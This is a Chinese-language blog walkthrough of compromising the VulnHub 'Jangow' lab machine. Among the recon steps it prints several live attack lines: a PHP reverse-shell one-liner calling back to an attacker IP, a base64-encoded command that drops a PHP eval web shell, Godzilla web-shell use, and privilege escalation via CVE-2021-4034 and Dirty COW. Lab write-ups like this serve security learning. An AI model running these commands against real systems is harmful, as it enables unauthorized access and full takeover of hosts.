<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"monkeyx1.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.17.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"show_result":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="靶机下载地址：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;jangow-101,754&#x2F; 信息收集首先使用sudo arp-scan -I eth0 -l获取主机的IP地址  然后使用nmap -sC -sV -p- 10.0.2.6 -o result.txt获取端口信息 在此期间我们可以访问其网站看看有没有开启http服务  扫描后台文件，使用dirsearch -u &amp;quo">
<meta property="og:type" content="article">
<meta property="og:title" content="Jangow">
<meta property="og:url" content="https://monkeyx1.github.io/2023/06/07/Jangow/index.html">
<meta property="og:site_name" content="柷澂">
<meta property="og:description" content="靶机下载地址：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;jangow-101,754&#x2F; 信息收集首先使用sudo arp-scan -I eth0 -l获取主机的IP地址  然后使用nmap -sC -sV -p- 10.0.2.6 -o result.txt获取端口信息 在此期间我们可以访问其网站看看有没有开启http服务  扫描后台文件，使用dirsearch -u &amp;quo">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607132232018.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607132709898.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607132926107.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607133041784.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607133837197.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607133952786.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607134046855.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607134321551.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607134510174.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607134550603.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607134751504.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607134918941.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607135029528.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607135859922.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607140023235.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607140159950.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607140253112.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607140430275.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607140531824.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607140638576.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607140652421.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607140830903.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607140948083.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607141129344.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607141156912.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607141338711.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607141420574.png">
<meta property="article:published_time" content="2023-06-07T05:07:45.000Z">
<meta property="article:modified_time" content="2024-07-27T17:31:00.675Z">
<meta property="article:author" content="柷澂">
<meta property="article:tag" content="vulnhub">
<meta property="article:tag" content="内网">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://monkeyx1.github.io/images/Jangow/image-20230607132232018.png">


<link rel="canonical" href="https://monkeyx1.github.io/2023/06/07/Jangow/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://monkeyx1.github.io/2023/06/07/Jangow/","path":"2023/06/07/Jangow/","title":"Jangow"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Jangow | 柷澂</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">柷澂</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">欢迎来到柷澂的安全小窝</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A4%96%E7%BD%91%E6%B8%97%E9%80%8F"><span class="nav-number">2.</span> <span class="nav-text">外网渗透</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F"><span class="nav-number">3.</span> <span class="nav-text">内网渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">3.1.</span> <span class="nav-text">提权</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="柷澂"
      src="/images/header.jpg">
  <p class="site-author-name" itemprop="name">柷澂</p>
  <div class="site-description" itemprop="description">心如明镜台，时时勤拂拭</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">43</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/monkeyx1" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;monkeyx1" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:647498949@qq.com" title="E-Mail → mailto:647498949@qq.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://monkeyx1.github.io/2023/06/07/Jangow/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/header.jpg">
      <meta itemprop="name" content="柷澂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="柷澂">
      <meta itemprop="description" content="心如明镜台，时时勤拂拭">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Jangow | 柷澂">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Jangow
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-06-07 13:07:45" itemprop="dateCreated datePublished" datetime="2023-06-07T13:07:45+08:00">2023-06-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-07-28 01:31:00" itemprop="dateModified" datetime="2024-07-28T01:31:00+08:00">2024-07-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/vulnhub/" itemprop="url" rel="index"><span itemprop="name">vulnhub</span></a>
        </span>
    </span>

  
    <span id="/2023/06/07/Jangow/" class="post-meta-item leancloud_visitors" data-flag-title="Jangow" title="阅读次数">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span class="leancloud-visitors-count"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>1.2k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>1 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>靶机下载地址：<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/jangow-101,754/">https://www.vulnhub.com/entry/jangow-101,754/</a></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>首先使用<code>sudo arp-scan -I eth0 -l</code>获取主机的IP地址</p>
<p><img src="/images/Jangow/image-20230607132232018.png"></p>
<p>然后使用<code>nmap -sC -sV -p- 10.0.2.6 -o result.txt</code>获取端口信息</p>
<p>在此期间我们可以访问其网站看看有没有开启http服务</p>
<p><img src="/images/Jangow/image-20230607132709898.png"></p>
<p>扫描后台文件，使用<code>dirsearch -u &quot;http://10.0.2.6/site/&quot;</code>，并没有发现什么有用的信息</p>
<p><img src="/images/Jangow/image-20230607132926107.png"></p>
<p>点击<code>buscar</code>发现有一个空白页面，还有一个参数可以进行传递</p>
<p><img src="/images/Jangow/image-20230607133041784.png"></p>
<p>经过payload的fuzz，发现存在命令执行</p>
<p><img src="/images/Jangow/image-20230607133837197.png"></p>
<p>nmap扫出来发现开放的端口只有21和80，然后尝试匿名FTP登录，发现失败了</p>
<p><img src="/images/Jangow/image-20230607133952786.png"></p>
<p><img src="/images/Jangow/image-20230607134046855.png"></p>
<h2 id="外网渗透"><a href="#外网渗透" class="headerlink" title="外网渗透"></a>外网渗透</h2><p>我们可以使用命令执行来通过PHP反弹shell</p>
<blockquote>
<p>php -r ‘$sock&#x3D;fsockopen(“10.0.2.15”,7777);exec(“&#x2F;bin&#x2F;bash -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3”);’</p>
</blockquote>
<p><img src="/images/Jangow/image-20230607134321551.png"></p>
<p>然后发现一直转，但是就是没有获取到shell，这里可能是对外不出网的，使用<code>curl</code>或者<code>wegt</code>验证一下，可以先使用whereis查看一下是否有wget</p>
<p><img src="/images/Jangow/image-20230607134510174.png"></p>
<p><img src="/images/Jangow/image-20230607134550603.png"></p>
<p>证明不出网，这里就要使用木马了，然后使用哥斯拉的不出网反弹shell功能获取shell。</p>
<p>先写入一句话木马</p>
<blockquote>
<p>echo ZWNobyAnPD9waHAgQGV2YWwoJF9QT1NUWzhdKTsgPz4nID4gc2hlbGwucGhw | base64 -d | sh</p>
</blockquote>
<p><img src="/images/Jangow/image-20230607134751504.png"></p>
<p>使用哥斯拉进行连接</p>
<p><img src="/images/Jangow/image-20230607134918941.png"></p>
<p>然后点击start，在本地使用<code>rlwrap -cAr nc 127.0.0.1 4444</code>获取shell</p>
<p><img src="/images/Jangow/image-20230607135029528.png"></p>
<p>然后使用<code>bash -i</code>获取更高级的shell，但是这个shell还是不够使用，使用whereis发现存在python的环境，所有我们可以使用下面的命令获取交互式shell</p>
<p><img src="/images/Jangow/image-20230607135859922.png"></p>
<h2 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h2><p>在html目录下发现<code>.backup</code>文件，然后使用cat命令查看发现是一个数据库的账号密码</p>
<p><img src="/images/Jangow/image-20230607140023235.png"></p>
<p>因为我们之前是发现了有ftp服务的，所以我们尝试使用这个账号密码是否可以进行登录</p>
<p><img src="/images/Jangow/image-20230607140159950.png"></p>
<p>无法进入root目录，所以权限还是不高的，还是要进行其他的操作</p>
<p><img src="/images/Jangow/image-20230607140253112.png"></p>
<p>使用<code>netstat -anlt</code>发现有22端口开放，应该是只对内部网络开放的（因为之前端口扫描并没有获取到端口信息）</p>
<p><img src="/images/Jangow/image-20230607140430275.png"></p>
<p>使用之前的账号密码也是可以进行登录的</p>
<p><img src="/images/Jangow/image-20230607140531824.png"></p>
<p>在该目录中获取第一个flag</p>
<p><img src="/images/Jangow/image-20230607140638576.png"></p>
<p>但是权限不高…………使用<code>uname -a</code>查看系统信息</p>
<p><img src="/images/Jangow/image-20230607140652421.png"></p>
<h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p>经过查找资料，发现这个版本是存在一个CVE漏洞的（CVE-2021-4034），通过查看发现确实可以利用</p>
<p><img src="/images/Jangow/image-20230607140830903.png"></p>
<p>然后我们使用ftp上传exp，使用put命令</p>
<p><img src="/images/Jangow/image-20230607140948083.png"></p>
<p>使用<code>gcc cve-2021-4034-poc.c -o exp</code>获取可执行文件，运行之后可以获取到root权限</p>
<p><img src="/images/Jangow/image-20230607141129344.png"></p>
<p><img src="/images/Jangow/image-20230607141156912.png"></p>
<p>还可以使用脏牛进行提权</p>
<p><img src="/images/Jangow/image-20230607141338711.png"></p>
<p><img src="/images/Jangow/image-20230607141420574.png"></p>
<p>也是可以获取root权限的</p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>柷澂
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://monkeyx1.github.io/2023/06/07/Jangow/" title="Jangow">https://monkeyx1.github.io/2023/06/07/Jangow/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
                    
                      <a href="/" rel="tag"><i class="fa fa-tag"></i> </a>
                    
                      <a href="/" rel="tag"><i class="fa fa-tag"></i> </a>
                    
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/05/18/SQL%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%E2%80%94%E2%80%94%E4%BA%8C%E5%88%86%E6%B3%95/" rel="prev" title="SQL时间盲注——二分法">
                  <i class="fa fa-chevron-left"></i> SQL时间盲注——二分法
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/06/07/earth/" rel="next" title="earth">
                  earth <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 2022 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">柷澂</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">181k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">2:44</span>
  </span>
</div><div>
  <span id="sitetime"></span>
  <script language=javascript>
      function siteTime(){
          window.setTimeout("siteTime()", 1000);
          var seconds = 1000;
          var minutes = seconds * 60;
          var hours = minutes * 60;
          var days = hours * 24;
          var years = days * 365;
          var today = new Date();
          var todayYear = today.getFullYear();
          var todayMonth = today.getMonth()+1;
          var todayDate = today.getDate();
          var todayHour = today.getHours();
          var todayMinute = today.getMinutes();
          var todaySecond = today.getSeconds();
          /* 
          Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
          year - 作为date对象的年份，为4位年份值
          month - 0-11之间的整数，做为date对象的月份
          day - 1-31之间的整数，做为date对象的天数
          hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
          minutes - 0-59之间的整数，做为date对象的分钟数
          seconds - 0-59之间的整数，做为date对象的秒数
          microseconds - 0-999之间的整数，做为date对象的毫秒数
      */
          var t1 = Date.UTC(2021,12,23,11,40,00); //北京时间2018-2-13 00:00:00
          var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
          var diff = t2-t1;
      var diffYears = Math.floor(diff/years);
      var diffDays = Math.floor((diff/days)-diffYears*365);
      var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
      var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
      var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
      document.getElementById("sitetime").innerHTML=" 已运行"+/*diffYears+" 年 "+*/diffDays+" 天 "+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒";
    }
      siteTime();
  </script>
</div>

    </div>
  </footer>

  

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  

  <script class="next-config" data-name="leancloud_visitors" type="application/json">{"enable":true,"app_id":"ccA2VsTMA0zc7SQqWsCEBhP6-gzGzoHsz","app_key":"RzrgPNrOtq5LckltkJZDwE0z","server_url":null,"security":true}</script>
  <script src="/js/third-party/statistics/lean-analytics.js"></script>



<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body>
</html>
